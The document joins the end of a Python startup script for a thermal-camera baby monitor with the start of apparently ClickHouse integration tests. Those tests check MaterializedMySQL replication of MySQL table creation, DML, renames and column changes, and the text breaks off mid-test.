bgr_thermal_queue = Queue(2)
frame_queue = Queue(5)
audio_queue = Queue(10)
faces_queue = Queue(1)
# Initialize transform matrix, a shared memory for video and control processes.
# NOTE TO SELF: give a sensible transform matrix for the initial case
shared_transform_matrix = Array('d', [ 9.37830895e-12, 1.00000000e+00, -3.96434172e-13,
8.62639189e-16, 2.35265233e-16, 5.09741339e-15,
-1.11682496e+01, -9.00591808e-03, 1.00000000e+00,
6.29504763e-04, 7.57604597e-17, -1.65846804e-15])
# Initialize shared memories for value types.
room_temp = Value('f', 23.5)
room_humid = Value('f', 36.09)
baby_temp = Value('f', 0.0)
baby_is_crying = Value(c_bool, False)
baby_feverish = Value(c_bool, False)
temp_offset = Value('f', 3.0)
# Load temperature map
temp_table = loadmat('source/control/temp_map_piecewise_linear.mat')['temp_v2']
temp_table = np.hstack((temp_table[4001:],temp_table[:4001]))
temp_dict = {int(a):b for a,b in temp_table}
# Initialize Process objects and target the necessary routines
audio_process = Process(name = 'audio_process',
target=audio_routine, args=(audio_queue, baby_is_crying))
video_process = Process(name = 'video_process',
target=video_routine, args=(frame_queue, bgr_thermal_queue,
temp_offset, temp_dict,
shared_transform_matrix, baby_is_crying,
faces_queue, baby_temp))
server_process = Process(name = 'server_process',
target=server_routine, args=(frame_queue, audio_queue,
room_temp, room_humid, baby_temp,
baby_is_crying,baby_feverish))
control_process = Process(name = 'control_process',
target=control_routine, args=(bgr_thermal_queue,
shared_transform_matrix,
room_temp, room_humid, baby_temp, temp_offset,
temp_dict, faces_queue, baby_feverish))
# Start the processes.
video_process.start()
audio_process.start()
control_process.start()
server_process.start()
|
materialize_with_ddl.py
|
import time
import pymysql.cursors
import pytest
from helpers.network import PartitionManager
import logging
from helpers.client import QueryRuntimeException
from helpers.cluster import get_docker_compose_path, run_and_check
import random
import threading
from multiprocessing.dummy import Pool
from helpers.test_tools import assert_eq_with_retry
def check_query(clickhouse_node, query, result_set, retry_count=10, interval_seconds=3):
lastest_result = ''
for i in range(retry_count):
try:
lastest_result = clickhouse_node.query(query)
if result_set == lastest_result:
return
logging.debug(f"latest_result {lastest_result}")
time.sleep(interval_seconds)
except Exception as e:
logging.debug(f"check_query retry {i+1} exception {e}")
time.sleep(interval_seconds)
else:
assert clickhouse_node.query(query) == result_set
def dml_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dml")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dml")
mysql_node.query("CREATE DATABASE test_database_dml DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_dml.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database_dml ENGINE = MaterializeMySQL('{}:3306', 'test_database_dml', 'root', 'clickhouse')".format(
service_name))
assert "test_database_dml" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n")
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(2, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', false);
""")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t2020-01-01 00:00:00\t0\n")
mysql_node.query("UPDATE test_database_dml.test_table_1 SET unsigned_tiny_int = 2 WHERE `key` = 1")
check_query(clickhouse_node, """
SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,
small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer,
unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col,
_date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */
_bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV
""",
"1\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n")
# update primary key
mysql_node.query("UPDATE test_database_dml.test_table_1 SET `key` = 3 WHERE `unsigned_tiny_int` = 2")
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n3\t2\t-1\t2\t-2\t3\t-3\t"
"4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `key` = 2')
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"3\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `unsigned_tiny_int` = 2')
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_dml")
mysql_node.query("DROP DATABASE test_database_dml")
def materialized_mysql_database_with_views(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
mysql_node.query("CREATE VIEW test_database.test_table_1_view AS SELECT SUM(tiny_int) FROM test_database.test_table_1 GROUP BY _date;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_database_with_datetime_and_decimal(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dt")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dt")
mysql_node.query("CREATE DATABASE test_database_dt DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_dt.test_table_1 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
clickhouse_node.query("CREATE DATABASE test_database_dt ENGINE = MaterializedMySQL('{}:3306', 'test_database_dt', 'root', 'clickhouse')".format(service_name))
assert "test_database_dt" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_1 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
mysql_node.query("CREATE TABLE test_database_dt.test_table_2 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_2 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
clickhouse_node.query("DROP DATABASE test_database_dt")
mysql_node.query("DROP DATABASE test_database_dt")
def drop_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_drop")
mysql_node.query("CREATE DATABASE test_database_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("CREATE TABLE test_database_drop.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
mysql_node.query("INSERT INTO test_database_drop.test_table_2 VALUES(1), (2), (3), (4), (5), (6)")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_drop")
mysql_node.query("DROP DATABASE test_database_drop")
def create_table_like_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("DROP DATABASE IF EXISTS create_like2")
clickhouse_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("CREATE DATABASE create_like")
mysql_node.query("CREATE DATABASE create_like2")
mysql_node.query("CREATE TABLE create_like.t1 (id INT NOT NULL PRIMARY KEY)")
mysql_node.query("CREATE TABLE create_like2.t1 LIKE create_like.t1")
clickhouse_node.query(
f"CREATE DATABASE create_like ENGINE = MaterializeMySQL('{service_name}:3306', 'create_like', 'root', 'clickhouse')")
mysql_node.query("CREATE TABLE create_like.t2 LIKE create_like.t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\n")
mysql_node.query("USE create_like")
mysql_node.query("CREATE TABLE t3 LIKE create_like2.t1")
mysql_node.query("CREATE TABLE t4 LIKE t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\nt4\n")
check_query(clickhouse_node, "SHOW DATABASES LIKE 'create_like%'", "create_like\n")
clickhouse_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like2")
def create_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_create")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_create")
mysql_node.query("CREATE DATABASE test_database_create DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_create.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("INSERT INTO test_database_create.test_table_1 VALUES(1), (2), (3), (5), (6), (7);")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_create ENGINE = MaterializedMySQL('{}:3306', 'test_database_create', 'root', 'clickhouse')".format(
service_name))
# Check for pre-existing status
assert "test_database_create" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_1 ORDER BY id FORMAT TSV",
"1\n2\n3\n5\n6\n7\n")
mysql_node.query("CREATE TABLE test_database_create.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_create.test_table_2 VALUES(1), (2), (3), (4), (5), (6);")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
clickhouse_node.query("DROP DATABASE test_database_create")
mysql_node.query("DROP DATABASE test_database_create")
def rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename")
mysql_node.query("CREATE DATABASE test_database_rename DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_rename.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("RENAME TABLE test_database_rename.test_table_1 TO test_database_rename.test_table_2")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_2\n")
mysql_node.query("RENAME TABLE test_database_rename.test_table_2 TO test_database_rename.test_table_1")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database_rename")
mysql_node.query("DROP DATABASE test_database_rename")
def alter_add_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_add")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_add")
mysql_node.query("CREATE DATABASE test_database_add DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_add.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_1 INT NOT NULL")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_add ENGINE = MaterializedMySQL('{}:3306', 'test_database_add', 'root', 'clickhouse')".format(
service_name))
assert "test_database_add" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_add.test_table_1 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("CREATE TABLE test_database_add.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_add FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_1 INT NOT NULL, ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1, ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
default_expression = "DEFAULT\t0" if service_name == "mysql57" else "DEFAULT\tid"
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t" + default_expression + "\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_add.test_table_2 VALUES(1, 2, 3, 4, 5), (6, 7, 8, 9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_add.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\t3\t4\t5\n6\t7\t8\t9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_add")
mysql_node.query("DROP DATABASE test_database_add")
def alter_drop_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
mysql_node.query("CREATE DATABASE test_database_alter_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_1 DROP COLUMN drop_column")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_2 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_2 DROP COLUMN drop_column")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_drop.test_table_2 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_drop.test_table_2 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_alter_drop")
mysql_node.query("DROP DATABASE test_database_alter_drop")
def alter_rename_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
mysql_node.query("CREATE DATABASE test_database_alter_rename DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_1 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_1 RENAME COLUMN rename_column TO new_column_name")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_2 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nrename_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_2 RENAME COLUMN rename_column TO new_column_name")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_rename.test_table_2 VALUES(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_rename.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\n3\t4\n5\t6\n7\t8\n9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_alter_rename")
mysql_node.query("DROP DATABASE test_database_alter_rename")
def alter_modify_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
mysql_node.query("CREATE DATABASE test_database_alter_modify DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_1 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_1 MODIFY COLUMN modify_column INT")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_modify ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_modify', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_modify" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_2 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
